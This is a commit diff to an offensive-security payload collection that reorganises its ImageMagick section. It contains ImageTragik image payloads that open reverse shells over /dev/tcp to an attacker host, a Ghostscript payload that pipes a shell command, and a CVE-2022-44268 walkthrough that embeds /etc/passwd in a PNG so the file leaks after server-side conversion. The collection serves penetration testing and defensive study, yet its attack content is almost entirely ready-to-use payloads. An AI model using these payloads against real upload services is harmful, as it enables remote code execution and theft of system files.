ImageMagick Typo
@ -4431,3 +4431,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||
* [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/)
|
||||
* [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse)
|
||||
* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/)
|
||||
* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](https://exploit.ph/external-trusts-are-evil.html)
|
@ -1,38 +0,0 @@
|
||||
# Image Tragik 1 & 2
|
||||
|
||||
|
||||
## Exploit v1
|
||||
|
||||
Simple reverse shell
|
||||
|
||||
```powershell
|
||||
push graphic-context
|
||||
encoding "UTF-8"
|
||||
viewbox 0 0 1 1
|
||||
affine 1 0 0 1 0 0
|
||||
push graphic-context
|
||||
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
|
||||
pop graphic-context
|
||||
pop graphic-context
|
||||
```
|
||||
|
||||
## Exploit v2
|
||||
|
||||
Simple `id` payload
|
||||
|
||||
```powershell
|
||||
%!PS
|
||||
userdict /setpagedevice undef
|
||||
save
|
||||
legal
|
||||
{ null restore } stopped { pop } if
|
||||
{ legal } stopped { pop } if
|
||||
restore
|
||||
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
|
||||
```
|
||||
|
||||
then use `convert shellexec.jpeg whatever.gif`
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2)
|
52
Upload Insecure Files/Picture ImageMagick/README.md
Normal file
@ -0,0 +1,52 @@
|
||||
# ImageMagick Exploits
|
||||
|
||||
## ImageTragik Exploit v1
|
||||
|
||||
Simple reverse shell
|
||||
|
||||
```powershell
|
||||
push graphic-context
|
||||
encoding "UTF-8"
|
||||
viewbox 0 0 1 1
|
||||
affine 1 0 0 1 0 0
|
||||
push graphic-context
|
||||
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
|
||||
pop graphic-context
|
||||
pop graphic-context
|
||||
```
|
||||
|
||||
## ImageTragik Exploit v2
|
||||
|
||||
Simple `id` payload
|
||||
|
||||
```powershell
|
||||
%!PS
|
||||
userdict /setpagedevice undef
|
||||
save
|
||||
legal
|
||||
{ null restore } stopped { pop } if
|
||||
{ legal } stopped { pop } if
|
||||
restore
|
||||
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
|
||||
```
|
||||
|
||||
then use `convert shellexec.jpeg whatever.gif`
|
||||
|
||||
|
||||
## CVE-2022-44268
|
||||
|
||||
Information Disclosure: embedded the content of an arbitrary remote file
|
||||
|
||||
* Generate the payload
|
||||
```ps1
|
||||
apt-get install pngcrush imagemagick exiftool exiv2 -y
|
||||
pngcrush -text a "profile" "/etc/passwd" exploit.png
|
||||
```
|
||||
* Trigger the exploit by uploading the file. The backend might use something like `convert pngout.png pngconverted.png`
|
||||
* Download the converted picture and inspect its content with: `identify -verbose pngconverted.png`
|
||||
* Convert the exfiltrated data: `python3 -c 'print(bytes.fromhex("HEX_FROM_FILE").decode("utf-8"))'`
|
||||
|
||||
|
||||
## Thanks to
|
||||
|
||||
* [openwall.com/lists/oss-security/2018/08/21/2 by Tavis Ormandy](http://openwall.com/lists/oss-security/2018/08/21/2)
|
Before Width: | Height: | Size: 194 B After Width: | Height: | Size: 194 B |
Before Width: | Height: | Size: 194 B After Width: | Height: | Size: 194 B |
After Width: | Height: | Size: 99 B |
Before Width: | Height: | Size: 424 B After Width: | Height: | Size: 424 B |
Before Width: | Height: | Size: 992 B After Width: | Height: | Size: 992 B |
@ -11,7 +11,7 @@
|
||||
* [Filename vulnerabilities](#filename-vulnerabilities)
|
||||
* [Picture compression](#picture-compression-)
|
||||
* [Configuration Files](#configuration-files)
|
||||
* [CVE - Image Tragik](#cve---image-tragik)
|
||||
* [CVE - ImageMagick](#cve---imagemagick)
|
||||
* [CVE - FFMpeg](#cve---ffmpeg)
|
||||
* [ZIP Archive](#zip-archive)
|
||||
* [Jetty RCE](#jetty-rce)
|
||||
@ -161,10 +161,11 @@ Alternatively you may be able to upload a JSON file with a custom scripts, try t
|
||||
}
|
||||
```
|
||||
|
||||
### CVE - Image Tragik
|
||||
### CVE - ImageMagick
|
||||
|
||||
Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)
|
||||
If the backend is using ImageMagick to resize/convert user images, you can try to exploit well-known vulnerabilities such as ImageTragik.
|
||||
|
||||
* ImageTragik example: Upload this content with an image extension to exploit the vulnerability (ImageMagick , 7.0.1-1)
|
||||
```powershell
|
||||
push graphic-context
|
||||
viewbox 0 0 640 480
|
||||
@ -172,7 +173,7 @@ fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-p
|
||||
pop graphic-context
|
||||
```
|
||||
|
||||
More payload in the folder `Picture Image Magik`
|
||||
More payloads in the folder `Picture ImageMagick`
|
||||
|
||||
### CVE - FFMpeg
|
||||
|
||||
|